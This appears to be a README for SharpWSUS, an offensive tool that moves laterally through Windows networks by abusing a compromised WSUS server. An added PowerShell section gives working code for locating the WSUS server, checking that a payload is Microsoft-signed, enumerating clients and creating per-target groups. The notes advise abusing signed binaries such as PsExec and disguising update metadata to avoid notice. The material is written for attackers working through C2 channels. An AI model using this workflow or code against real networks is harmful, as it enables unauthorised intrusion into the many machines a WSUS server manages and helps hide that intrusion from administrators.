SharpWSUS: CSharp tool for lateral movement through WSUS
SharpWSUS
SharpWSUS is a CSharp tool for lateral movement through WSUS.
WSUS (Windows Server Update Services) is a Microsoft solution that lets administrators deploy Microsoft product updates and patches across an environment in a scalable manner, with clients pulling updates from an internal WSUS server instead of reaching out to the internet directly. WSUS is extremely common within Windows corporate environments, and because clients trust whatever the WSUS server approves for them, control of that server gives an attacker a signed, policy-sanctioned path onto every client it manages.
SharpWSUS is a continuation of earlier WSUS attack tooling (WSUSPendu and Thunder_Woosus) and aims to bring their complete functionality to .NET in a tool that can be reliably used through C2 channels and offers flexibility to the operator.
The flow of using SharpWSUS for lateral movement is as follows:
- Locate the WSUS server and compromise it.
- Enumerate the contents of the WSUS server to determine which machines to target.
- Create a WSUS group.
- Add the target machine to the WSUS group.
- Create a malicious patch.
- Approve the malicious patch for deployment.
- Wait for the client to download the patch.
- Clean up after the patch is downloaded.
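As an added example (not part of SharpWSUS or its README), the PowerShell below covers the preparation around that flow: locating the WSUS server from a compromised client, checking that a candidate payload carries a Microsoft signature before building an update around it, and enumerating or creating target groups through the public WSUS administration API. It relies on the Group Policy registry values WSUS clients are configured with, `Get-AuthenticodeSignature`, and the `UpdateServices` module's `Get-WsusServer` object model; the payload path, group name and target host name are placeholders. Publishing a custom update is not exposed by that API, which is the part SharpWSUS's create step handles.

```powershell
# Added example, not SharpWSUS code. The WSUS-side functions need the
# UpdateServices module, which only exists on the WSUS server itself, and
# must run as a WSUS administrator. Paths and names below are placeholders.

# Step 1: which WSUS server does this client trust? Group Policy writes the
# URL into the WindowsUpdate policy key, so a domain-joined client tells you
# where to go without touching the network.
function Get-ConfiguredWsusServer {
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    if (-not (Test-Path $key)) { return $null }   # no WSUS policy applied
    $p = Get-ItemProperty -Path $key
    [pscustomobject]@{
        WUServer       = $p.WUServer        # update download/metadata URL
        WUStatusServer = $p.WUStatusServer  # reporting URL, usually the same
    }
}

# Clients only install update payloads signed by Microsoft, so verify the
# candidate binary's Authenticode signature before wasting a deployment cycle.
function Test-MicrosoftSigned {
    param([Parameter(Mandatory)][string]$Path)
    $sig = Get-AuthenticodeSignature -FilePath $Path
    if ($sig.Status -ne 'Valid') { return $false }
    # Subject match is a heuristic; a broken or untrusted chain already fails above.
    return $sig.SignerCertificate.Subject -like '*O=Microsoft Corporation*'
}

# Step 2: enumerate existing groups and their members (run on the WSUS server).
function Get-WsusTargetInventory {
    Import-Module UpdateServices -ErrorAction Stop
    $wsus = Get-WsusServer
    foreach ($g in $wsus.GetComputerTargetGroups()) {
        [pscustomobject]@{
            Group   = $g.Name
            Members = ($g.GetComputerTargets() | ForEach-Object FullDomainName) -join ', '
        }
    }
}

# Steps 3 and 4: create (or reuse) a group and add the target machine to it.
function New-WsusGroupWithTarget {
    param(
        [Parameter(Mandatory)][string]$GroupName,
        [Parameter(Mandatory)][string]$TargetFqdn
    )
    Import-Module UpdateServices -ErrorAction Stop
    $wsus  = Get-WsusServer
    $group = $wsus.GetComputerTargetGroups() | Where-Object Name -eq $GroupName
    if (-not $group) { $group = $wsus.CreateComputerTargetGroup($GroupName) }
    $target = $wsus.GetComputerTargets() | Where-Object FullDomainName -eq $TargetFqdn
    if (-not $target) { throw "No WSUS client named $TargetFqdn has checked in" }
    $group.AddComputerTarget($target)
    $group
}

# Usage (placeholder values):
Get-ConfiguredWsusServer
Test-MicrosoftSigned -Path 'C:\Tools\PsExec64.exe'
Get-WsusTargetInventory | Format-Table -AutoSize
# New-WsusGroupWithTarget -GroupName 'Demo Group' -TargetFqdn 'target01.corp.local'
```

A per-target group is used rather than approving against an existing group so that the malicious update only ever reaches the intended machine; the same group is what the clean-up step removes afterwards.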
Notes
- The payload binary has to be signed by Microsoft, because clients reject unsigned or third-party-signed update content, so Microsoft-signed binaries that execute attacker-supplied arguments (PsExec, msiexec, msbuild, etc.) are useful for lateral movement.
- The metadata arguments on the create command are optional but useful for blending in to the environment, since the update is visible in the WSUS console to anyone who looks.
- If testing in a lab, the first update is usually installed quickly, but each subsequent update can take a couple of hours to land. This is due to how Windows evaluates whether an update is already installed, so allow for the delay rather than re-approving.